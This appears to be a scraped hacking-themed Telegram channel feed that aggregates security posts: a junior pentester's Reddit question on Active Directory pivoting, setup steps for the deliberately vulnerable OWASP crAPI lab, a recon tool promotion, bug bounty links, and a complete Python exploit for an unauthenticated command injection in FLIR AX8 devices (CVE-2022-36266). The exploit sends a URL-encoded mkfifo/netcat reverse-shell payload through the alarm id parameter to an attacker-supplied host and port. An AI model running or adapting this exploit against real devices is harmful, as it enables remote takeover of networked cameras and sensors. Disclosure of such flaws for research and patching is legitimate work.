Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Active Directory privesc and pivoting
https://www.reddit.com/r/Pentesting/comments/wsd2lp/active_directory_privesc_and_pivoting/

*I posted this in r/ethicalhacking (https://www.reddit.com/r/ethicalhacking) as well, however I figured that this sub might be more fitted for this type of thread. I'm a junior penetration tester doing my first large-scale test on a big organization together with another junior colleague. We have gained system access to a member server via a share misconfiguration which allowed us to upload a webshell and get code execution from the web app that ran. We are sort of stuck right now and can't seem to find a way forward. No luck from dumping SAM, as there were no sessions from high-priv users. The only thing we got from that server was a DCC hash we couldn't crack. Other than that it was clean. We passed the local admin hash around to all servers in the domain, but nothing. The only set of domain credentials we have is one domain user, which we got from password spraying, and it doesn't have access to other interesting shares. Responder hasn't picked anything up, which is strange since LLMNR /mDNS isn't disabled. The user doesn't appear to have write access to any frequently used shares, so we see no point in planting link files all over. Kerberoasting yielded nothing as the service accounts seem to have incredibly strong passwords. We'd appreciate some tips on how to more forward, if anyone's got anything. We feel like owning one server has to be useful in further escalating our privileges. Then again, we're probably missing something since we're noobs. submitted by /u/memeabiding (https://www.reddit.com/user/memeabiding)
[link] (https://www.reddit.com/r/Pentesting/comments/wsd2lp/active_directory_privesc_and_pivoting/) [comments] (https://www.reddit.com/r/Pentesting/comments/wsd2lp/active_directory_privesc_and_pivoting/)

___________________________
@hacking_Attack
@Hacking_Video
completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable (https://www.kitploit.com/search/label/Vulnerable) by design, but you'll be able to safely run it to educate/train yourself. crAPI is modern, built on top of a microservices architecture. When time has come to buy your first car, sign (https://www.kitploit.com/search/label/Sign) up for an account and start your journey. To know more about crAPI, please check crAPI's overview (https://github.com/OWASP/crAPI/blob/develop/docs/overview.md).
QuickStart Guide Docker You'll need to have Docker installed and running on your host system. Using prebuilt images You can use prebuilt images generated by our CI workflow. To use the latest stable version. Linux Machine curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

docker-compose pull

docker-compose -f docker-compose.yml --compatibility up -d
Windows Machine curl.exe -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

docker-compose pull

docker-compose -f docker-compose.yml --compatibility up -d
To use the latest development version Linux Machine curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/develop/deploy/docker/docker-compose.yml

VERSION=develop docker-compose pull

VERSION=develop docker-compose -f docker-compose.yml --compatibility up -d
Windows Machine Visit http://localhost:8888 (http://localhost:8888/) Note: All emails (https://www.kitploit.com/search/label/Emails) are sent to mailhog service by default and can be checked on http://localhost:8025 (http://localhost:8025/) You can change the smtp configuration if required however all emails with domain example.com will still go to mailhog. Vagrant This option allows you to run crAPI within a virtual machine, thus isolated from your system. You'll need to have Vagrant (https://www.vagrantup.com/downloads) and, for example VirtualBox (https://www.virtualbox.org/wiki/Downloads) installed. Clone crAPI repository $ git clone [REPOSITORY-URL]
Start crAPI Virtual Machine $ cd deploy/vagrant && vagrant up
Visit http://192.168.33.20 (http://192.168.33.20/) Note: All emails are sent to mailhog service and can be checked on http://192.168.33.20:8025 (http://192.168.33.20:8025/) Once you're done playing with crAPI, you can remove it completely from your system running the following command from the repository root directory $ cd deploy/vagrant && vagrant destroy
For more deployment options visit the setup instructions (https://github.com/OWASP/crAPI/blob/develop/docs/setup.md) for more details. To know more about challenges in crAPI. Visit challenges (https://github.com/OWASP/crAPI/blob/develop/docs/challenges.md)

Download crAPI (https://github.com/OWASP/crAPI)

___________________________
@hacking_Attack
@Hacking_Video
Good reporting tool for team to use that is compatible with nessus?
https://www.reddit.com/r/redteamsec/comments/wsgqks/good_reporting_tool_for_team_to_use_that_is/

Currently we use Dradis and it works... but it could be a whole lot better. We are trying a lot of demos at the moment. We've tried attack forge and a couple others. Does anyone have any recommendations? submitted by /u/Ziggy__Pop (https://www.reddit.com/user/Ziggy__Pop)
[link] (https://www.reddit.com/r/redteamsec/comments/wsgqks/good_reporting_tool_for_team_to_use_that_is/) [comments] (https://www.reddit.com/r/redteamsec/comments/wsgqks/good_reporting_tool_for_team_to_use_that_is/)

___________________________
@hacking_Attack
@Hacking_Video
New Bug Bounty Vault on Hats: Welcome Mover!

With great excitement we welcome another project to Hats Finance. Through our decentralized bug bounty platform, we onboard Mover to…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Recon Tool: Is it alive?

Recon Tool: Is it alive?Post Views: 130 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/08/Patreon.png Subscribe to Patreon to watch this episode.
Reading Time: 2 Minutes What is Is it Alive?This tool is written by us for Bug Bounty Hunters, Pentesters and Red teams with speed in mind. When performing Recon, depending on the tools you will use, even if passive or active techniques are used, you will end up with huge lists of IP addresses, Hosts, URLs, and Subdomains. But as we know Bug Bounty for example is all about time management and working smart. From these hosts/URL’s/IPs especially if they are huge, we know that many are either from the Wayback machine, or any source, that often is not alive or no longer available, so using this tool, on any of these will immediately probe them and save them into two files, Valid and Invalid so that you can work more efficiently and never waste time on hosts that are no longer valid!
See Also: So you want to be a hacker? Complete Offensive Security and Ethical Hacking Course Installationgit clone https://github.com/blackhatethicalhacking/isitalive.gitcd isitalivechmod +x isitalive.shisitalive.sh -hInstructionsAll you have to do when you run this tool is provide it with a list of:

* IP addresses
* Hosts
* Subdomains
* URLs

This way: isitalive.sh target.txtIt will then start probing and saving in real-time the results under output with Valid and Invalid files.
Trending: OSINT Tool: Blackbird ScreenshotsMain Menuhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/08/isitalive-1024x576.png CompatibilityTested on Kali Linux, Parrot OS, MacOS DisclaimerThis tool is provided for educational and research purpose only. The author of this project are no way responsible for any misuse of this tool. We use it to test under NDA agreements with clients and their consents for Pentesting purposes and we never encourage to misuse or take responsibility for any damage caused!
Clone the repo from here: GitHub Link
Trending: Write up: How do QR Codes work and how criminal hackers use them to generate phishing attacks – Demo https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/08/Blackbird-300x150.png OSINT Tool: BlackbirdAugust 12, 2022
Reading Time: 5 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/08/Offensive-Azure-300x150.png Offensive Security Tool: Offensive-AzureAugust 5, 2022
Reading Time: 4 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/07/Pretender-300x150.png Offensive Security Tool: PretenderJuly 29, 2022
Reading Time: 4 minutes

* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/07/DDoS-Layer7-bheh-300x150.png Offensive Security Tool: DDoS-Layer7-bhehJuly 28, 2022
Reading Time: 3 minutes https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png Offensive Security & Ethical Hacking CourseBegin the learning curve of hacking now!
The post Recon Tool: Is it alive? first appeared on Black Hat Ethical Hacking.
My Bug Bounty Resources

author : — SATYAMPContinue reading on Medium »
Read more...
Account takeover worth $1000

How I was able to find account takeover bug in one of the biggest organization in the worldContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
FLIX AX8 1.46.16 Remote Command Execution

https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png FLIR AX8 versions 1.46.16 and below unauthenticated remote OS command injection exploit.

SHA-256 | c15429c7636538e3c66b41a8e08cead26806777a1c4d976fe977decddd2d2157Download # -*- coding: utf-8 -*-

# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link)
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-36266

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()

def banner():
flirLogo = """
███████╗██╗ ██╗██████╗
██╔════╝██║ ██║██╔══██╗
█████╗ ██║ ██║██████╔╝
██╔══╝ ██║ ██║██╔══██╗
██║ ███████╗██║██║ ██║
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
.---------------------.
█████╗ ██╗ ██╗ █████╗ /--'--.------.--------/|
██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||
███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||
██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| ||
██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/
╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------`

\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(flirLogo))

def pingWebInterface(RHOST, RPORT):
url = 'http://{}:{}/login/'.format(RHOST, RPORT)
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
try:
if response.status_code != 200:
print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
version = soup.find('p', id = 'login-title').string
print('[INFO] {} detected.'.format(version))
except:
print('[ERROR] Can\'t grab the device version...')
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)
data = 'action=alarm&id=2;{}'.format(payload)

headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}

try:
print('[INFO] Executing reverse shell...')
response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
return
except Exception as e:
print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
return False
def main():
banner()
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
IOS finally patched Pegasus?

Given that apple have found a vulnerability in IOS that allowed the attacker to totally take control of an IOS device, do you think that apple have finally cracked down on the Israeli hacker for hire tool that seems to be able to do just that?

submitted by /u/adyman95
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video